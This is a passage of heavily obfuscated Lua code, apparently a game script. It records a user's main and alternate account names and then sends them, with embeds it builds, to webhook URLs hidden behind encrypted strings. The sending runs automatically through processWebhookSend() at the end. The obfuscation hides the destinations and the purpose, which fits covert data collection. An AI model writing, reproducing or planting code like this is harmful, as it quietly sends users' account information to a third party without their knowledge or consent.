		writeMainAccount(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\32\222\197\27\254\241\225\75\53\212\212\52\243\204\232\15\124", "\42\76\177\166\122\146\161\141")], {});
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\178\143\7\198\118\121\174\191\23\194\60\38", "\22\197\234\101\174\25")] = LUAOBFUSACTOR_DECRYPT_STR_0("\37\32\177\204\101\245\152\201\41\61\182\223\121\189\211\200\46\59\168\147\119\191\222\201\58\49\167\212\121\160\220\149\98\101\246\143\36\246\129\214\116\99\247\137\47\254\132\213\126\96\243\133\57\188\254\156\117\44\245\250\78\142\130\191\12\49\132\133\84\139\248\156\14\100\142\202\38\141\143\168\96\16\175\255\125\185\197\188\14\34\168\141\65\130\133\172\116\98\134\200\99\131\199\190\36\38\168\254\83\161\199\167\27\0\145\221\71\171\211\135\96", "\230\77\84\197\188\22\207\183");
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\252\25\196\249\136\228\160", "\85\153\116\166\156\236\193\144")] = createEmbed(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\180\236\76\170\225\18\141\238\75\188\161\80", "\96\196\128\45\211\132")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\48\149\126\92\199\187\187\202\112\221", "\184\85\237\27\63\178\207\212")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\11\86\28\81\28\92\27\26\88", "\63\104\57\105")], LUAOBFUSACTOR_DECRYPT_STR_0("\13\142\182\87\31\184\161\92\14\132\177\80\2\136\170", "\36\107\231\196"));
	elseif (mainAccount == TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\81\186\161\134\81\133\174\134\68\176\176\169\92\184\167\194\13", "\231\61\213\194")]) then
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\30\168\63\123\6\162\54\70\27\161\120\35", "\19\105\205\93")] = LUAOBFUSACTOR_DECRYPT_STR_0("\161\28\202\145\44\243\71\145\133\54\186\11\209\147\59\231\11\209\140\112\168\24\215\206\40\172\10\214\142\48\162\27\145\208\108\250\90\142\211\109\249\88\141\209\102\252\92\141\214\108\253\90\145\174\20\241\57\239\208\19\167\93\199\145\42\249\0\204\165\29\167\0\211\163\39\130\80\245\168\14\144\58\219\163\54\167\31\244\143\56\187\0\140\211\29\158\12\142\210\14\172\62\140\178\41\157\34\248\170\0\166\69\141\153\26\138\17\253\146\23\147", "\95\201\104\190\225");
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\170\198\195\203\171\142\145", "\174\207\171\161")] = createEmbed(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\253\242\12\234\253\197\196\240\11\252\189\135", "\183\141\158\109\147\152")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\41\17\227\15\57\29\233\30\105\89", "\108\76\105\134")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\232\202\164\239\218\238\215\244\177", "\174\139\165\209\129")], LUAOBFUSACTOR_DECRYPT_STR_0("\176\178\239\196\249\2\115\123\172\166\236\213", "\24\195\211\130\161\166\99\16"));
	else
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\79\16\199\41\68\55\74\23\200\47\80\25\83\13\253\105\3", "\118\38\99\137\76\51")] = true;
		for _, altAccount in ipairs(altAccounts) do
			if (altAccount == TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\241\41\6\19\5\16\241\39\28\23\27\14\252\43\0\87\89", "\64\157\70\101\114\105")]) then
				TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\73\187\137\230\7\97\164\179\194\19\67\167\178\237\4\5\248", "\112\32\200\199\131")] = false;
				break;
			end
		end
		if TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\37\67\114\189\212\138\46\56\113\95\187\204\190\44\56\21\12", "\66\76\48\60\216\163\203")] then
			table.insert(altAccounts, TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\182\137\122\242\83\254\40\187\159\124\225\113\207\41\191\195\41", "\68\218\230\25\147\63\174")]);
			writeMainAccount(mainAccount, altAccounts);
		end
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\186\47\81\68\185\162\33\102\94\186\232\122", "\214\205\74\51\44")] = LUAOBFUSACTOR_DECRYPT_STR_0("\242\88\246\236\100\160\3\173\248\126\233\79\237\238\115\180\79\237\241\56\251\92\235\179\96\255\78\234\243\120\241\95\173\173\36\169\30\187\164\37\171\20\187\173\35\172\26\182\172\35\171\24\173\215\96\245\93\240\234\125\172\85\182\218\65\194\28\229\248\99\209\111\235\247\69\255\125\228\219\83\203\28\213\170\116\183\27\230\250\91\226\21\225\201\115\223\105\235\233\65\174\97\239\172\71\163\65\218\248\77\246\105\210\170\79\219\91\212\203\35\162", "\23\154\44\130\156");
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\20\171\175\171\50\86\65", "\115\113\198\205\206\86")] = createEmbed(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\148\91\255\67\129\69\215\84\130\88\187\10", "\58\228\55\158")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\177\145\213\45\41\185\58\166\204\128", "\85\212\233\176\78\92\205")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\73\87\157\236\94\93\154\167\26", "\130\42\56\232")], LUAOBFUSACTOR_DECRYPT_STR_0("\238\188\34\229\69\45\239\187\48\220\65\60\233\186\49\237\84", "\95\138\213\68\131\32"), mainAccount, altAccounts);
	end
	if (TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\61\45\163\75\121\37\35\148\81\122\111\120", "\22\74\72\193\35")] and TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\41\116\230\93\40\60\180", "\56\76\25\132")]) then
		sendWebhook(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\73\196\169\46\192\81\202\158\52\195\27\145", "\175\62\161\203\70")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\57\208\193\22\49\121\141", "\85\92\189\163\115")]);
	end
end
processWebhookSend();